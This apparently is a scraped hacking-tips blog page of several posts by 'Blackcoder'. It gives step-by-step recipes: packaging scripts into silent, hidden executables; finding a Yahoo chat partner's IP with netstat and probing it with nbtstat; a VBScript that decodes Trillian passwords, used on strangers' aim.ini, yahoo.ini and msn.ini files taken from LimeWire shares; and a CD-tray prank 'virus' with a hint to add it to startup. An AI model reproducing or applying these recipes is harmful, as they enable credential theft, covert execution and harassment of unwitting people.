Get An Account For Any Site Or Forum !!!
i Friends.

I just came across with a site which gives you usernames and passwords for almost everysite.

I thought of sharing it with you.So,just check it out.I am sure you will love it.

The Site is
http://www.bugmenot.com/

Just enter the address of the forum or any site you want to access and get the pass to enter.
To convert a .bat or a .vbs file into an executable .exe ..
To convert a .bat or a .vbs file into an executable .exe file without any software
follow the step:-

Step 1
Navigate to C:\Windows\System32 and locate the file named IEXPRESS.EXE

Step 2
Double Click to launch IEXPRESS.EXE or just type & enter iexpress.exe in start>run box.

Step 3
You will be presented with the initial welcome screen and be given two choices. Select “Create new Self Extraction Directive file.” Click Next.

Step 4
Next you will be presented with the Package Purpose screen. For our purposes select “Extract Files and run an installation command” and click the Next button.

Step 5
You will be presented with the Package Title screen, which will give you the opportunity to give your project a name. If you are so inclined give it a meaningful name. If like me you are never going to come back to this, name it whatever you want.

Step 6
You will next be presented with the Confirmation Prompt Screen. We would like the batch file to just be extracted and run so just choose “No Prompt” and click the Next Button.

Step 7
You are presented with the License Agreement window. If you don’t want your users to have to answer a prompt select “Do not display a license.”

Step 8
The Packaged Files window is where you will select your batch file (or .vbs). Click the Add button and browse to your desired file. Then click next.

Step 9
Here you are presented with a window titled Install Program to Launch. Use the drop down control next to “Install Program and choose the only option that will be present, the .bat or .vbs file that you chose in the previous window.

Step 10
The Show Window screen is next. I didn’t want my users to be prompted in any way so I chose Hidden. Click Next.

Step 11
No Finished Message for my users. Select “No message” and choose Next.

Step 12
The Package Name and Options window is where the new .exe specified. Type in a path or browse to the folder you would like your .exe in, type a name in the file name box and click save. Also check the box that says “Hide File Extraction Progress Animation from User.” If you’re worried about long file names go ahead and click the other box as well.

Step 13
Since we really aren’t installing anything we probably want to tell the Configure Restart window to not restart. So choose the option that says “No restart” and hit Next.

Step 14
This window is where you have a chance to save all of the options you have chosen into a project file so that if necessary you may later return and make modifications. I have no need to retain the file, but if you would like to be able to come back to it, by all means choose “Save Self Extraction Directive (SED) file” and tell it where to put it. As always, click Next.

Step 15
Here’s where you’re new .exe is born, on the Create Package screen. Explore to the directory you told it to put the file in, click Next and then watch your little .exe’s first moments as it pops into the big digital world.

Step 16
You’re done! Click finish and go try it out.

Blackcoder
Change Your IP...
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

do at ur own risk
Blackcoder
Break Yahoo Account While Chatting....
This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.

2) When we send files yahoo has 2 options

a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files

3) When we use video or audio:-

a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse

1) Its impossible to get a Attackers IP address when you only chat.

2) There are 50 % chances of getting a IP address when you send files

3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio

1) Go to dos

type ->
netstat -n 3

You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id:
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.



So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
Blackcoder
Hack Passwords using Limewire...
1. Download LimeWire and install it (Reboot computer if needed)
The newest verion of LimeWire is here:


Code:
http://www.limewire.com/download/index.php

2. Open "Notepad"

3. Copy and Paste the following code into Notepad

Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = "243,038,129,196,057,134,219,146,113,163,185,230,0 83,122,149," & _

"124,000,000,000,000,000,000,255,000,000,128,000,0 00,000,128," & _

"128,000,255,000,000,000,128,000,128,000,128,128,0 00,000,000," & _

"128,255,000,128,000,255,000,128,128,128,000,085,1 10,097,098," & _

"108,101,032,116,111,032,114,101,115,111,108,118,1 01,032,072," & _

"084,084,080,032,112,114,111,120,000"

keys = split(key, ",")

main()

sub main()

pwd = ""

pwd = inputbox("Enter the Encrypted Trillian Password", "", "")

if pwd = "" then exit sub

pwd = trim(pwd)

pwdl = len(pwd)/2

redim pwds(pwdl-1)

for x = 0 to ubound(pwds)

'msgbox mid(pwd,(x * 2)+1,2)

pwds(x) = int("&h" & mid(pwd,(x * 2)+1,2))

next

if ubound(pwds) > ubound(keys) then

maxval = ubound(keys)

else

maxval = ubound(pwds)

end if

for x = 0 to maxval

goods = goods & chr(pwds(x) xor keys(x))

next

inputbox "Decrypted Password","",goods

end sub


4. Select FILE and choose SAVE AS

5. From the "Save as Type" drop-down menu select "All Files (*.*)"

6. Save the file as "TrillianPass.vbs" in the desired folder. Remember it's location.

7. Start LimeWire

8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini

9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.

10. Open the downloaded file in Notepad.

11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.

12. Open the file that was created earlier: TrillianPass.vbs

13. Paste the encryped password into the Trillian Password Cracker and press "OK" to reveal the real password

14. How this works:

The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program's preferences are set to share a whole drive instead of just one or two folders .
Accessing window's system from linux ...

Accessing window's system from linux :

type in terminal..
rdesktop -f (for full screen) IPAddress
that's it .........
ex:
[root @ filesystem] rdesktop -a 24 -f IP

Blackcoder
AutoCDRom open/close Virus...

AutoCDRom open/close Virus

Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.
Heres how it goes

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Save as .vbs and run it.

Harmless but loads of fun. Just think what all you can do by adding it to startup
  • Followers

back to top